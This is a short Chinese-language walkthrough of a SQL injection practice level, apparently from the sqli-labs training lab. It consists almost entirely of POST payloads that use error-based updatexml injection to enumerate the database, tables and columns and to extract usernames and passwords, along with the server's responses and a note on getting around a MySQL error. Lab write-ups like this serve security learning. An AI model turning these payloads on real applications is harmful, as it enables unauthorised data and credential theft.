SQLi 十七关

uname=admin&passwd=admin' and 1=1#&submit=Submit

uname=admin&passwd=admin' and 1=2#&submit=Submit

深刻感受到我没有学到SQL注入的精髓.

uname=admin&passwd=admin' order by 1#&submit=Submit

Unknown column '1' in 'order clause'

我很懵逼,why.....

uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))#&submit=Submit　　#XPATH syntax error: '~security~'

uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&submit=Submit　　#XPATH syntax error: '~users~'

uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&submit=Submit　　#XPATH syntax error: '~username~'

uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&submit=Submit　　#XPATH syntax error: '~password~'

uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select password from users),0x7e),1))#&submit=Submit

跪了:You can't specify target table 'users' for update in FROM clause

不能先select表中的某些值，再update这个表（在同一语句中）。

 

解决方法：将select出的结果作为派生表再select一遍，这样就规避了错误。

 

 

注意：此问题只出现于MySQL，msSQL和Oracle不会出现此问题。

 

 

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e),1)#&submit=Submit　　#XPATH syntax error: '~Dumb~'

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select password from users limit 0,1) a),0x7e),1)#&submit=Submit　　#XPATH syntax error: '~Dumb~'